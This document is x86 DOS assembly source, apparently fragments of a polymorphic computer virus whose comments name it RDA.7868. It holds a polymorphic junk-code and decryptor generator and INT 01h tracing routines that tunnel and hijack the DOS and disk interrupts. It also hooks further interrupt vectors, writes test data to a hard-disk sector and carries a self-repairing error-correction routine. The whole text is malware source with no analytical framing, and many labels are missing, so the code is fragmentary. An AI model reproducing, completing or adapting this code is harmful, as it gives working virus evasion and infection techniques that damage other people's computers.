cmp byte ptr ds:[pointer_direction], 0
jz mom_loop_next
mov [bp+si+10h], di
mov ax, 0
pop cx
pop bx
pop si
inc si
loop mom_loop_gen

cmp byte ptr ds:[create_or_just_read], 1
; if = 0 then we are creating the memory modificating code, so this routine
; must generate the [pnt],reg pair for the instruction and put it in al
; if = 1 then we are just creating the inverse algorithm, so the routine will
; just read the corrispondent register pair from the stack structure
; and pass it back in al.
jz just_reading_already_existing

mov ax, 7
call get_random_limit ; get a random reg
; to operate with
cmp byte ptr ds:[pointer_register], 3
jnz proceed_next_check
cmp al, 3
jz chk_reselect_reg
cmp al, 7
jz chk_reselect_reg
cmp byte ptr ds:[pointer_register], 7
jnz chk_not_di
mov bl, 5
cmp byte ptr ds:[pointer_register], 6
jnz chk_not_si
mov bl, 4
cmp byte ptr ds:[pointer_register], 5
jnz chk_not_bp
mov bl, 6
cmp byte ptr ds:[pointer_register], 3
jnz chk_not_bx
mov bl, 7
shl ax, 1
shl ax, 1
shl ax, 1
or al, bl
mov ah, ds:[pointer_direction]
mov cl, 7
shl ah, cl
or al, ah

push si
mov si, ds:[math_seq_stack_off] ; to correct entry
mov bp, ds:[layer_sp_pointer] ; to stack zone
mov [bp+si+30h], al ; save on stack for l8r
inc word ptr ds:[math_seq_stack_off] ; on next one
pop si

push si
mov bp, ds:[layer_sp_pointer] ; to stack zone
mov si, ds:[math_seq_stack_off] ; to correct entry
mov al, [bp+si+30h] ; get it off stack
pop si
inc word ptr ds:[math_seq_stack_off] ; on next

; ---------------------------------------------------------------------------
; routines that create math operations on memory
mov al, 30h ; xor [reg],reg
call correct_regpair_in_al

mov al, 0 ; add [reg],reg
call correct_regpair_in_al

mov al, 28h ; sub [reg],reg
call correct_regpair_in_al

mov al, 0D0h ; ror [reg],1
call correct_regpair_in_al
and al, 0C7h
or al, 8

mov al, 0D2h ; ror [reg],cl
call correct_regpair_in_al
and al, 0C7h
or al, 8

mov al, 0D0h ; rol [reg],1
call correct_regpair_in_al
and al, 0C7h

mov al, 0D2h ; rol [reg],cl
call correct_regpair_in_al
and al, 0C7h

mov al, 0FEh ; inc [reg]
call correct_regpair_in_al
and al, 0C7h

mov al, 0FEh ; dec [reg]
call correct_regpair_in_al
and al, 0C7h
or al, 8

mov al, 0F6h ; neg [reg]
call correct_regpair_in_al
and al, 0C7h
or al, 18h

mov al, 0F6h ; not [reg]
call correct_regpair_in_al
and al, 0C7h
or al, 10h
; ---------------------------------------------------------------------------

push ax bx cx dx di si es ds

mov byte ptr ds:[register_compat + 1], 0
mov byte ptr ds:[register_compat], 0

mov ax, 10h
call get_random_limit
mov ds:[garbage_instr_number], al

mov byte ptr ds:[restrict_grb_ax_is_used], 0
mov byte ptr ds:[using_8_bits_register], 0

call select_garbage_register
call check_reg_compatibility
jz no_garb_limitnd

mov ax, 6
call get_instr_with_compat
call call_generator

call check_init
cmp byte ptr ds:[register_compat + 1], 0EFh
jnz begin_initreg_stuff ; all initialized?
mov ds:[all_regs_initial_pnt], di
pop ds es si di dx cx bx ax

mov di, ds:[all_regs_initial_pnt] ; store end of this
ret ; part
call check_garbage_ended
jmp short init_ended_chk

cmp byte ptr ds:[garbage_instr_number], 0 ; finished
jz garbage_instr_fnshed ; garb instr?
dec byte ptr ds:[garbage_instr_number]
jmp short do_one_garbage_instr

call get_random_0_or_1
cmp ax, 0
jnz do_one_garbage_instr
mov ax, 5
call get_random_limit
mov bx, ax ; initialize the register
shl bx, 1 ; to a known value
call [offset service_routines_table + bx]

mov cl, ds:[garbage_register]
mov al, 1
shl al, cl
mov si, ds:[garbage_word_byte]
or [si+register_compat], al ; mark as initialized
jmp short exit_this_stage

call get_instr_from_table ; select instruction from table
call call_generator ; generate code using table info
; with appropriate handler

mov cx, 4
mov al, 11h

mov ah, ds:[register_compat]
and ah, al
cmp ah, al
jnz check_init_fc
mov bl, al
and bl, 0Fh ; low nibble
or ds:[register_compat + 1],bl
jmp short not_used_in_this
mov bl, al
and bl, 0Fh
test ds:[register_compat + 1], bl ; used in this exec?
jz not_used_in_this
or ds:[register_compat], al ; signal usage
shl al, 1 ; check next bit (register)
loop check_init_loop

; selects garbage register and the dimension (w/b) and stores it in memory
call get_random_0_or_1 ; word or byte
mov ds:[garbage_word_byte], ax

mov ax, 7 ; get a register for garbage
call get_random_limit

cmp word ptr ds:[garbage_word_byte], 1
jnz no_sp_check_needed_gs

cmp al, 4 ; do not use SP
jz redo_sel_gs ; redo selection

mov ds:[garbage_register], al ; save reg

; gets: si pointer to entry table
lodsb ; gets byte from table
and al, 0Fh ; last nibble contains both lenght
; and type of instruction
mov bl, al
xor bh, bh ; calculate pointer to handler
shl bl, 1
dec si ; to beginning of entry
jmp [offset routines_table + bx]

; gets: si pointer to table entry
; returns: ax lenght of the table entry

lodsb ; get the first byte of the entry
and al, 0Fh ; lower nibble needed for lenght

cmp al, 2
jz entry_long_two_bytes

cmp al, 3
jz entry_long_two_bytes

cmp al, 6
jz entry_long_two_bytes

cmp al, 7
jz entry_lenght_coded_in_hn

mov ax, 1 ; else long 1 byte

dec si ; restore si (for previous lodsb)

mov ax, 2
jmp short return_move_through_table

dec si
lodsb ; reget full byte
shr al, 1 ; shift the lower nibble
shr al, 1 ; out and keep the higher
shr al, 1 ; that holds instruction
shr al, 1 ; length
xor ah, ah
jmp short return_move_through_table

; returns: si pointer to selected entry in the table
mov si, offset i_table_start
mov ax, 60h
call get_random_limit ; select entry from table
xchg ax, cx
jcxz no_end_table_ff

call end_table_ff_check ; check for end
call move_through_table ; get lenght entry
inc si
add si, ax ; and skip the entry
loop table_skipping_loop ; loop to desired entry

cmp byte ptr [si], 0FFh ; reached end of table
jnz no_end_table_ff
mov si, offset i_table_start ; if so restart

; gets: dx value of compatible entries to check with the hn
; returns: si pointer to selected entry in table
mov dx, ax ; dx holds compatible type
mov si, offset i_table_start
mov ax, 5Fh ; select random instruction from tbl
call get_random_limit
xchg ax, cx
inc cx

call end_table_ff_check

lodsb ; get info byte from table entry
dec si
push ax
and al, 0Fh ; mask low nibble
cmp al, 7 ; high nibble means lenght?
pop ax
jz skip_this_entry ; don't use variable lenght entries

shr al, 1 ; push away lower nibble
shr al, 1
shr al, 1
shr al, 1

and al, dl ; al has compatibility info
cmp al, dl
jnz skip_this_entry
dec cx ; if compatible count this
jz end_table_ff_check

call move_through_table
add si, ax ; skip entry
inc si
jmp short loop_search_compat

; checks if the garbage register is compatible with the used regs
; returns flags to confirm. Z ok, NZ not ok

push cx ax si
cmp word ptr ds:[garbage_word_byte], 1
jz rc_check_bytesize
mov cl, ds:[garbage_register]
mov al, 1 ; check the right bit
shl ax, cl
test ds:[register_compat], al
pop si ax cx

mov cl, ds:[garbage_register]
mov al, 1
shl ax, cl
test ds:[register_compat + 1], al
jnz rc_exitrout
cmp cl, 3 ; if < must check 8bit aswell
ja gewd_regcomp_exit
mov al, 11h
shl ax, cl ; check both 8bits regs
test ds:[register_compat], al
jz gewd_regcomp_exit
mov byte ptr ds:[using_8_bits_register], 1

xor ah, ah ; just set the Z flag
cmp ah, 0
jmp short rc_exitrout

; put a register that has been already initialized in bl
push cx
push si
mov ax, 7
call get_random_limit
mov cx, ax ; get a reg
mov al, 1 ; its coding
xor ah, ah
shl ax, cl
mov si, ds:[garbage_word_byte]
test [si+register_compat], al ; ok if already used
jz find_areg_usable
pop si
mov bl, cl ; return in bl
pop cx

; creates many types of instructions depending on the given data byte. the
; instructions can either have registers as source and destionation or can
; have a memory reference (also with registers used as pointer) as the source.
cmp byte ptr ds:[using_8_bits_register], 1
jz come_home_rout
inc si
call check_reg_compatibility ; with reg or without?
jz dontuse_grbreg

mov bx, ds:[garbage_word_byte]
cmp byte ptr [bx+register_compat], 0 ; no regs used?
jz come_home_rout

or ax, ds:[garbage_word_byte]
call get_a_reg_in_bl_usable ; get an initialized reg
mov al, 0C0h
or al, ds:[garbage_register] ; dest

shl bl, 1 ; reg * 8, src
shl bl, 1
shl bl, 1
or al, bl ; make it with that reg
stosb ; store

lodsb ; get the data byte
or ax, ds:[garbage_word_byte]
or al, 2

mov ax, 0FF14h
call get_random_limit ; here we select some random
; reg/regs to be used as pnt
and al, 0C7h
mov bl, ds:[garbage_register]
shl bl, 1 ; reg * 8, this is the dest
shl bl, 1
shl bl, 1
or al, bl ; make it with that reg
stosb ; store
push ax
pop bx
and al, 0C0h

cmp al, 40h ; see which kind of op has
jz requires_a_byte ; been generated and put some
; more bytes if needed. this
cmp al, 80h ; bytes should be memory
jz requires_a_word ; offsets (ie. [bx+123])

cmp al, 0
jnz come_home_rout
and bl, 7
cmp bl, 6
jz requires_a_word

mov al, [di-1]
or al, 0C0h
mov [di-1], al

mov ax, 9E6Ah
call get_random_limit
cmp ax, 0
jnz not_zero_hh
inc ax
jmp short come_home_rout

mov al, ah
cmp al, 0 ; zero not allowed
jnz not_zero_hhh
inc al
jmp short come_home_rout

; copies one byte from the data bytes of the entry and then puts an
; immediate after it (word or byte depending on [garbage_word_byte]).
; this doesn't use the selected garbage register, but rather it uses the
; one defined already by the opcode in the table.
cmp byte ptr ds:[garbage_register], 0 ; is ax?
jnz copi_notusingax
cmp byte ptr ds:[using_8_bits_register], 1
jz copi_return_fr

test byte ptr ds:[register_compat + 1], 1 ; ax used?
jnz copi_alnotused
test byte ptr ds:[register_compat], 11h ; used ah/al
jnz copi_return_fr

cmp byte ptr ds:[restrict_grb_ax_is_used], 1
jz copi_return_fr

mov ax, 0C350h
call get_random_limit

push ax
inc si ; copy the immediate
cmp word ptr ds:[garbage_word_byte], 1
jnz copi_byte_dimension

or al, 1 ; word dim and store everything
pop ax
jmp short copi_return_fr

and al, 0FEh ; here is byte
pop ax


; creates math instructions that uses an immediate
cmp byte ptr ds:[using_8_bits_register], 1
jz man_with_imm_ret

inc si
lodsb ; first byte opcode
or ax, ds:[garbage_word_byte] ; dimension
stosb ; ok!

lodsb ; second byte opcode
or al, 0C0h ; for math instr
or al, ds:[garbage_register] ; with grb reg

mov ax, 0EA60h
call get_random_limit
cmp word ptr ds:[garbage_word_byte], 1
jnz man_bytesizer ; put the immediate
stosw ; of correct size
jmp man_with_imm_ret

; uses two opcodes and generates various math instructions (only 16bits)
cmp byte ptr ds:[using_8_bits_register], 1
jz man_with_imm_ret

inc si ; skip info byte
lodsb ; get first opcode
or ax, ds:[garbage_word_byte] ; correct dimension

lodsb ; get second opcode
or al, 0C0h ; for all math ops used
or al, ds:[garbage_register] ; correct register

; gets one opcode and correct it to use the selected register (but only
; for 16bits registers)
cmp word ptr ds:[garbage_word_byte], 1 ; only with words
jnz cantcreat_ret
cmp byte ptr ds:[using_8_bits_register], 1
jz cantcreat_ret
inc si
lodsb ; load opcode
or al, ds:[garbage_register] ; correct reg
stosb ; store

; just copies one byte
inc si ; skip info byte
lodsb ; read byte
stosb ; store byte

; just copies one word
inc si ; skip info byte
lodsw ; read word
stosw ; store word

; just copies the given number of bytes (ie. some fake int routines and such)
cmp byte ptr ds:[register_compat], 0 ; all regs must be
jnz cant_rout_cpy ; available
cmp byte ptr ds:[register_compat + 1], 0
jnz cant_rout_cpy

call move_through_table ; get how many bytes has
inc si ; as when reading table
mov cx, ax
repe movsb ; just copy the desired chunk as grb

; generates a jump (type from the table) and some garbage to jump over
inc si ; skip info byte
lodsb ; read/write jump type

mov ds:[grb_jump_place], di ; store actual pointer
mov byte ptr ds:[using_8_bits_register], 0
inc di
test byte ptr ds:[register_compat], 11h
jz jump_nogrb_restronax
mov byte ptr ds:[restrict_grb_ax_is_used], 1

mov ax, 5
call get_random_limit ; how many instructions
inc ax ; the jump will jump
mov cx, ax

push cx
mov cx, 5 ; max retries to choose reg

push cx
call select_garbage_register
mov si, ds:[garbage_word_byte]
mov al, 1
mov cl, ds:[garbage_register]
shl al, cl
test [si+register_compat], al
pop cx
loopne jump_select_usable_reg

or cx, cx ; exited for too many tries?
jz jump_skip_this_garbage

cmp word ptr ds:[garbage_word_byte], 0
jz jump_noneed_8bitchk
cmp byte ptr ds:[garbage_register], 3 ; if > bx then no8bit
ja jump_noneed_8bitchk
mov al, 11h
mov cl, ds:[garbage_register]
shl al, cl
test ds:[register_compat], al
jnz jump_skip_this_garbage

mov ax, 6
call get_instr_with_compat
call call_generator

pop cx
loop jump_garbage_loop

mov bx, di
mov ax, ds:[grb_jump_place]
inc ax
sub ax, bx ; calculate the offset for
neg al ; the jump
mov si, ds:[grb_jump_place]
mov [si], al ; store the offset

; service routines, put a register to a known value.
mov ax, 0D2F0h
call get_random_limit
push ax
mov al, 0C6h ; mov base opcode
or ax, ds:[garbage_word_byte] ; correct size
mov bl, ds:[garbage_register] ; second opcode for
mov al, 0c0h ; mov reg,imm
or al, bl
pop ax ; the random imm

cmp word ptr ds:[garbage_word_byte], 1
jnz imm_here_is_byte
jmp imm_here_is_stored

mov si, ds:[garbage_word_byte]
mov al, 1
mov cl, ds:[garbage_register]
shl al, cl
or [si+register_compat], al

mov al, 28h ; sub reg,reg opcode
or ax, ds:[garbage_word_byte]
mov al, ds:[garbage_register]
mov cl, 3 ; put both src and dest to
shl al, cl ; the given register
or al, 0C0h
or al, ds:[garbage_register]
mov al, 30h ; xor reg,reg opcode
or ax, ds:[garbage_word_byte]
mov al, ds:[garbage_register]
mov cl, 3 ; put both src and dest to
shl al, cl ; the given register
or al, 0C0h
or al, ds:[garbage_register]

mov al, 80h ; and reg,imm opcode 1
or ax, ds:[garbage_word_byte]
mov al, 0E0h ; and reg,imm opcode 2
or al, ds:[garbage_register]
mov cx, ds:[garbage_word_byte]
inc cx ; has lenght, so nr of imms
mov al, 0 ; and with zero
repe stosb

mov al, 80h ; or reg,imm opcode 1
or ax, ds:[garbage_word_byte]
mov al, 0C8h ; or reg,imm opcode 2
or al, ds:[garbage_register]
mov cx, ds:[garbage_word_byte]
inc cx ; has lenght, so nr of imms
mov al, 0FFh ; or with -1
repe stosb


int01_virus proc near ; Interrupt 01h of RDA.7868
pop word ptr cs:[tunnel_addr+02h]
pop word ptr cs:[tunnel_addr]
push word ptr cs:[tunnel_addr]
push word ptr cs:[tunnel_addr+02h]

mov cs:[sp_],sp ; Store stack pointer

push ax ; Save AX at stack
push cs ; Save CS at stack
pop ax ; Load AX from stack (CS)

cmp word ptr cs:[tunnel_addr],ax
jne exam_tun_int ; Tunneling own segment? Jump to e...

mov ax,cs:[tun_exit_off]
cmp ax,word ptr cs:[tunnel_addr+02h]
je int01_exit ; Finnished tunneling? Jump to int...
cmp cs:[tun_int_stat],00000001b
jne scan_int21 ; Tunneling interrupt 21h? Jump to...

cmp word ptr cs:[tunnel_addr],70h
jne int01_exit_ ; Not DOS segment? Jump to int01_e...
mov cs:[tunnel_stat],00000001b
call store_int01

jmp int01_exit__
push cx di si es ds ; Save registers at stack
push cs ; Save CS at stack
pop ds ; Load DS from stack (CS)

mov es,word ptr [tunnel_addr]
mov di,word ptr [tunnel_addr+02h]
lea si,scan_string ; SI = offset of scan_string
mov cx,(scan_end-scan_begin)
push di ; Save DI at stack
cld ; Clear direction flag
rep cmpsb ; Found scan-string at instructio...?
pop di ; Load DI from stack
jne scan_int21_ ; Not equal? Jump to scan_int21_
pop ds es si di cx ; Load registers from stack

jmp found_seg
lea si,scan_string_ ; SI = offset of scan_string_
mov cx,(scan_end_-scan_begin_)
rep cmpsb ; Found scan-string at instructio...?
je found_seg_ ; Equal? Jump to found_seg_
pop ds es si di cx ; Load registers from stack
push bp ; Save BP at stack
mov bp,cs:[sp_] ; BP = stack pointer
or word ptr [bp+04h],0000000100000000b
pop bp ; Load BP from stack
pop ax ; Load AX from stack

int01_virus_ proc near ; Interrupt 01h of RDA.7868
int03_virus proc near ; Interrupt 03h of RDA.7868
int2a_virus proc near ; Interrupt 2ah of RDA.7868
iret ; Interrupt return

store_int01 proc near ; Set address of interrupt 01h
push bp es bx dx ax ; Save registers at stack
mov bp,cs:[sp_] ; BP = stack pointer
and word ptr [bp+04h],1111111011111111b

push ds ; Save DS at stack
mov ds,word ptr cs:[int01_addr_+02h]
mov dx,word ptr cs:[int01_addr_]
mov bx,01h ; BX = interrupt vector 01h
call set_int_addr
pop ds ; Load DS from stack

pop ax dx bx es bp ; Load registers from stack

ret ; Return

tunnel_int21 proc near ; Tunnel interrupt 21h
push es ; Save ES at stack
mov [tunnel_stat],00000000b

mov bx,21h ; BX = interrupt vector 21h
call get_int_addr
mov word ptr [int21_addr_+02h],es
mov word ptr [int21_addr_],bx

lea dx,int01_virus ; DX = offset of int01_virus
call load_int01

mov [tun_int_stat],00000000b

pushf ; Save flags at stack
pop ax ; Load AX from stack (flags)
or ax,0000000100000000b
push ax ; Save AX at stack
popf ; Load flags from stack (AX)

lea ax,tun_i21_exit ; AX = offset of tun_i21_exit
mov [tun_exit_off],ax ; Store offset of tun_i21_exit

pushf ; Save flags at stack
push cs ax ; Save registers at stack
mov ah,30h ; Get DOS version
jmp [int21_addr_]
cmp [tunnel_stat],00000001b
jne tun_i21_exi ; Not finnished tunneling? Jump to...

mov ax,word ptr [tunnel_addr]
mov word ptr [int21_addr_+02h],ax
mov ax,word ptr [tunnel_addr+02h]
mov word ptr [int21_addr_],ax
pop es ; Load ES from stack

ret ; Return

tunnel_int13 proc near ; Tunnel interrupt 13h
push es ; Save ES at stack
mov [tunnel_stat],00000000b
mov [tun_i13_stat],00000001b

mov bx,13h ; BX = interrupt vector 13h
call get_int_addr
mov word ptr [int13_addr+02h],es
mov word ptr [int13_addr],bx

lea dx,int01_virus ; DX = offset of int01_virus
call load_int01

mov [tun_int_stat],00000001b

pushf ; Save flags at stack
pop ax ; Load AX from stack (flags)
or ax,0000000100000000b
push ax ; Save AX at stack
popf ; Load flags from stack (AX)

lea ax,tun_i13_exit ; AX = offset of tun_i13_exit
mov [tun_exit_off],ax ; Store offset of tun_i13_exit

pushf ; Save flags at stack
push cs ax ; Save registers at stack
mov ax,400h ; Verify disk sector(s) (no sectors)
mov dx,0ffh ; Head zero, drive one-hundred and...
jmp [int13_addr]
cmp [tunnel_stat],00000001b
jne tun_i13_exi ; Not finnished tunneling? Jump to...

mov ax,word ptr [tunnel_addr]
mov word ptr [int13_addr+02h],ax
mov ax,word ptr [tunnel_addr+02h]
mov word ptr [int13_addr],ax
pop es ; Load ES from stack

ret ; Return

exam_cache proc near ; Examine if disk is cached
push cs ; Save CS at stack
pop ds ; Load DS from stack (CS)

mov [tun_i13_stat],00000001b

push cs ; Save CS at stack
pop es ; Load ES from stack (CS)

mov ax,201h ; Read sector(s) into memory (one...)
mov dx,80h ; DX = head- and drive number (ha...)
lea bx,data_buffer ; BX = offset of data_buffer
mov cx,02h ; CX = cylinder- and sector number
int 13h
jc cache_exit ; Error? Jump to cache_exit

push [bx] ; Save two bytes of disk sector at...
mov [bx],'FS' ; Store 'FS' in the second disk se...
mov ax,301h ; Write disk sector(s) (one disk ...)
call int13_call

mov ax,201h ; Read sector(s) into memory (one...)
int 13h

cmp word ptr [bx],'FS' ; Disk cached?
pop [bx] ; Load two bytes of disk sector fr...
jne disk_cached ; Not equal? Jump to disk_cached

mov [tun_i13_stat],00000000b
mov ax,301h ; Write disk sector(s) (one disk sector)
call int13_call
mov [cache_stat],01h ; Don't examine if disk is cached

ret ; Return

scan_string db 10010000b ; NOP (opcode 90h)
db 10010000b ; NOP (opcode 90h)
db 11101000b ; CALL (opcode 0e8h,?,?)
scan_string_ db 11111010b,10000000b
db 11111100b ; CLI, CMP AL,imm8 (opcode 0fah,8...)

get_int_addr proc near ; Get interrupt address
xor ax,ax ; Zero AX
mov es,ax ; ES = segment of interrupt table
shl bx,01h ; BX = offset of interrupt address
shl bx,01h ; " " " " " "
les bx,es:[bx] ; ES:BX = interrupt address

ret ; Return

get_int_add proc near ; Get interrupt address
lds dx,cs:[si] ; DS:DX = interrupt address

set_int_addr proc near ; Set interrupt address
cli ; Clear interrupt-enable flag
xor ax,ax ; Zero AX
mov es,ax ; ES = segment of interrupt table
shl bx,01h ; BX = offset of interrupt address
shl bx,01h ; " " " " " "
mov es:[bx],dx ; Store interrupt offset
mov es:[bx+02h],ds ; Store interrupt segment
sti ; Set interrupt-enable flag

ret ; Return

load_int01 proc near ; Get and set address of interrupt...
push si ; Save SI at stack
xor si,si ; Zero SI
call load_int01_
pop si ; Load SI from stack

ret ; Return

load_int01_ proc near ; Get and set address of interrupt...
push es ; Save ES at stack
mov bx,01h ; BX = interrupt vector 01h

push bx ; Save BX at stack
call get_int_addr
mov word ptr [si+int01_addr_],bx
mov word ptr [si+int01_addr_+02h],es
pop bx ; Load BX from stack

call set_int_addr
pop es ; Load ES from stack

ret ; Return

restore_int proc near ; Restore address of interrupt 13h...
push dx es ds ; Save registers at stack

push cs ; Save CS at stack
pop ds ; Load DS from stack (CS)
push ds ; Save DS at stack

mov bx,21h ; BX = interrupt vector 21h
push bx ; Save BX at stack
call get_int_addr
mov word ptr [int21_addr__+02h],es
mov word ptr [int21_addr__],bx
mov dx,word ptr [int21_addr_]
mov ds,word ptr [int21_addr_+02h]
pop bx ; Load BX from stack
call set_int_addr
pop ds ; Load DS from stack

push ds ; Save DS at stack
mov bx,13h ; BX = interrupt vector 13h
push bx ; Save BX at stack
call get_int_addr
mov word ptr [int13_addr_+02h],es
mov word ptr [int13_addr_],bx
mov dx,word ptr [int13_addr]
mov ds,word ptr [int13_addr+02h]
pop bx ; Load BX from stack

cmp cs:[tun_i13_stat],00000001b
je dont_set_i13 ; Interrupt 13h is in use? Jump to...

call set_int_addr
pop ds ; Load DS from stack

mov bx,24h ; BX = interrupt vector 24h
push bx ; Save BX at stack
call get_int_addr
mov word ptr [int24_addr+02h],es
mov word ptr [int24_addr],bx
lea dx,int24_virus ; DX = offset of int24_virus
pop bx ; Load BX from stack
call set_int_addr

mov bx,01h ; BX = interrupt vector 01h
push bx ; Save BX at stack
call get_int_addr
mov word ptr [int01_addr+02h],es
mov word ptr [int01_addr],bx
pop bx ; Load BX from stack
lea dx,int01_virus_ ; DX = offset of int01_virus_
call set_int_addr

mov bx,03h ; BX = interrupt vector 03h
push bx ; Save BX at stack
call get_int_addr
mov word ptr [int03_addr+02h],es
mov word ptr [int03_addr],bx
pop bx ; Load BX from stack
lea dx,int03_virus ; DX = offset of int03_virus
call set_int_addr

mov bx,2ah ; BX = interrupt vector 2ah
push bx ; Save BX at stack
call get_int_addr
mov word ptr [int2a_addr+02h],es
mov word ptr [int2a_addr],bx
lea dx,int2a_virus ; DX = offset of int2a_virus
pop bx ; Load BX from stack
call set_int_addr
pop ds es dx ; Load registers from stacl

ret ; Return

get_int_add_ proc near ; Get interrupt addresses
push ds es ; Save segments at stack
lea si,int21_addr__ ; SI = offset of int21_addr__
mov bx,21h ; BX = interrupt vector 21h
call get_int_add

lea si,int13_addr_ ; SI = offset of int13_addr
mov bx,13h ; BX = interrupt vector 13h
call get_int_add

lea si,int24_addr ; SI = offset of int24_addr
mov bx,24h ; BX = interrupt vector 24h
call get_int_add

lea si,int2a_addr ; SI = offset of int2a_addr
mov bx,2ah ; BX = interrupt vector 2ah
call get_int_add

lea si,int01_addr ; SI = offset of int01_addr
mov bx,01h ; BX = interrupt vector 01h
call get_int_add

lea si,int03_addr ; SI = offset of int03_addr
mov bx,03h ; BX = interrupt vector 03h
call get_int_add
pop es ds ; Load segments from stack

ret ; Return

push ax bx cx dx si di es ds

mov ax, 9 ; selected nr of info bits
push ax ; for ecc

mov ax, 170h ; lenght (in segments) of
push ax ; stuff to check

mov ax, offset ecc_temp_buffer
mov cl, 4
shr ax, cl ; to segment
mov dx, cs ; virus segment
add ax, dx
push ax ; temporary memory for calc

mov ax,offset ecc_check_data
shr ax, cl ; convert to segment
add ax, dx ; add base CS
push ax ; ecc data to check with

mov ax,offset int08_virus ; pointer to code where ecc
shr ax, cl ; is calculated from
add ax, dx
push ax

call ecc_entrypoint
pop ds es di si dx cx bx ax

arg_0 = word ptr 4
arg_2 = word ptr 6
arg_4 = word ptr 8
arg_6 = word ptr 0Ah
arg_8 = word ptr 0Ch

push bp
mov bp, sp
push [bp+arg_6] ; lenght in paras
push [bp+arg_4] ; temp space
push [bp+arg_0] ; where from
call ecc_create_table

push [bp+arg_8] ; info bits
push [bp+arg_2] ; check data segment
push [bp+arg_4] ; ecc data segment generated before
call ecc_compute_diffs

mov es, [bp+arg_4] ; ecc data segment
mov cx, [bp+arg_8] ;
shl cx, 1
shl cx, 1
shl cx, 1
xor di, di
xor ax, ax
repe scasw
jcxz ecc_returnpoint ; cx=0 means body is ok, otherwise
; body has to be corrected
push [bp+arg_8] ; nr info bits
push [bp+arg_4] ; ecc data segment that keeps changes
push [bp+arg_2] ; check data segment
push [bp+arg_0] ; where begins checking on code
call ecc_correct_diffs

pop bp
retn 0Ah

arg_0 = word ptr 4
arg_2 = word ptr 6
arg_4 = word ptr 8

push bp
mov bp, sp
push cx
mov ax, 8000h
xor cx, cx

test [bp+arg_4], ax ; lenght
jnz ecc_findmsb_end_2
inc cx
shr ax, 1 ; find msb
jmp short ecc_findmsb_2

xor ax, [bp+arg_4] ; end lenght?
jz ecc_finish_calc_2

mov ax, [bp+arg_0] ; AX:0 has code
add ax, [bp+arg_4] ; + seg current chunk
add ax, cx ;
sub ax, 11h ; - 100h for com exec - 10h
; to get begin of chunk
pop cx
pop bp
retn 6

mov ax, 0Fh
sub ax, cx
add ax, [bp+arg_2]
stc ; signal last loop

pop cx
pop bp
retn 6

var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = word ptr -0Ch
var_A = word ptr -0Ah
var_8 = word ptr -8
var_6 = word ptr -6
var_4 = word ptr -4
var_2 = word ptr -2
arg_0 = word ptr 4
arg_2 = word ptr 6
arg_4 = word ptr 8

push bp
mov bp, sp
sub sp, 10h
mov dx, 8000h

test [bp+arg_4], dx ; lenght
jnz ecc_findmsb_end_1
shr dx, 1 ; find position of msb
jmp short ecc_findmsb_1

lea di, [bp+var_10]
mov cx, 8
xor ax, ax
push ss
pop es
repe stosw ; clear part of stack
mov cx, [bp+arg_4] ; lenght

test cx, dx
jz ecc_finish_calc_1

push cx ; lenght
push [bp+arg_2]
push [bp+arg_0]
call ecc_create_table_second
mov es, ax
jb ecc_loopcalc_pre_end_1

mov ax, es:0
xor [bp+var_10], ax ; create on local var storage
mov ax, es:2
xor [bp+var_E], ax
mov ax, es:4
xor [bp+var_C], ax
mov ax, es:6
xor [bp+var_A], ax
mov ax, es:8
xor [bp+var_8], ax
mov ax, es:0Ah
xor [bp+var_6], ax
mov ax, es:0Ch
xor [bp+var_4], ax
mov ax, es:0Eh
xor [bp+var_2], ax

dec cx
jmp short ecc_loopcalc_1

xchg ax, cx
mov cx, 8
lea si, [bp+var_10] ; copy the generated data
xor di, di
repe movs word ptr es:[di+0], word ptr ss:[si+0]
xchg ax, cx
shr dx, 1 ; all the parts done?
jb ecc_loopcalc_end_1
jmp short ecc_findmsb_end_1

; from es:0 all the generated stuff
mov sp, bp
pop bp
retn 6

arg_0 = word ptr 4
arg_2 = word ptr 6
arg_4 = word ptr 8

push bp
mov bp, sp
mov ds, [bp+arg_0] ; data segment calcualted at
; compilation
mov es, [bp+arg_2] ; calculated before
xor bx, bx

mov ax, es:[bx]
xor [bx], ax ; compute differences
inc bx
inc bx
cmp bx, 10h
jb ecc_calc_diff_loop
inc [bp+arg_0] ; next 10h chunk
inc [bp+arg_2] ; next 10h chunk
dec [bp+arg_4] ; how many left
jnz ecc_calc_diff_next_chunk
pop bp
retn 6

arg_0 = word ptr 4
arg_2 = word ptr 6
arg_4 = word ptr 8
arg_6 = word ptr 0Ah

push bp
mov bp, sp
mov bl, 1 ; from first bit

xor si, si

xor cx, cx
mov di, [bp+arg_6] ; on ecc data
add di, [bp+arg_4] ; + part we are checking
dec di

mov ds, di
shr byte ptr [si], 1 ; count differences and put
rcl cx, 1 ; in cx
dec di
cmp di, [bp+arg_4]
jnb ecc_correct_countloop

or cx, cx
jz ecc_correct_bytechain_ok

push cx ; else let's try to correct
push [bp+arg_2]
push [bp+arg_0]
call ecc_create_table_second ; get the correction
mov ds, ax
xor [si], bl ; and correct

inc si
cmp si, 10h
jb ecc_correct_nextseg

shl bl, 1 ; next bit checking
jnb ecc_correct_nextbit
pop bp
retn 8

; just to pad the ecc stuff to a 10h alignment
xchg bx,bx
xchg bx,bx
xchg bx,bx
xchg bx,bx
xchg bx,bx
xchg bx,bx

db 80h, 80h,0C5h, 7Fh, 54h, 6Fh,0A8h,0CDh
db 74h, 28h, 5h,0B1h,0B9h, 62h,0B2h,0B9h
db 0BEh, 5Dh, 70h,0F2h, 3Ch,0B6h, 7Ah, 29h
db 5Eh, 39h, 9Dh, 95h, 17h, 46h,0B7h, 23h
db 71h, 16h,0E8h, 26h, 7Bh, 10h,0DCh, 50h
db 3Fh, 8Fh, 77h, 1Ch, 40h, 19h, 48h, 88h
db 0E4h, 9Bh,0E3h, 10h, 75h,0F6h,0B9h, 69h
db 0D3h,0FDh,0BCh, 8Dh,0CFh, 62h, 56h,0A4h
db 2Eh, 22h,0FBh,0E2h,0A3h, 27h, 1Fh, 91h
db 23h, 28h, 45h,0D4h, 9Fh, 4Ch,0B7h, 8Bh
db 0D7h,0A1h, 54h, 6Fh, 95h,0B4h, 4Eh, 7Dh
db 0F9h, 93h,0B0h,0CCh,0D6h, 5h, 99h,0AAh
db 0B9h, 37h, 36h, 99h, 19h, 2Fh, 0Bh, 59h
db 9Eh,0E4h, 8Dh,0D0h, 93h,0F4h, 62h,0E0h
db 3Eh, 7Ah,0B6h,0BDh,0C3h, 8Fh,0EFh, 4Fh
db 0CCh, 24h,0D6h, 0h, 36h,0E9h, 94h, 55h
db 0A5h, 70h, 8h,0B2h,0DAh,0A9h, 25h,0EBh
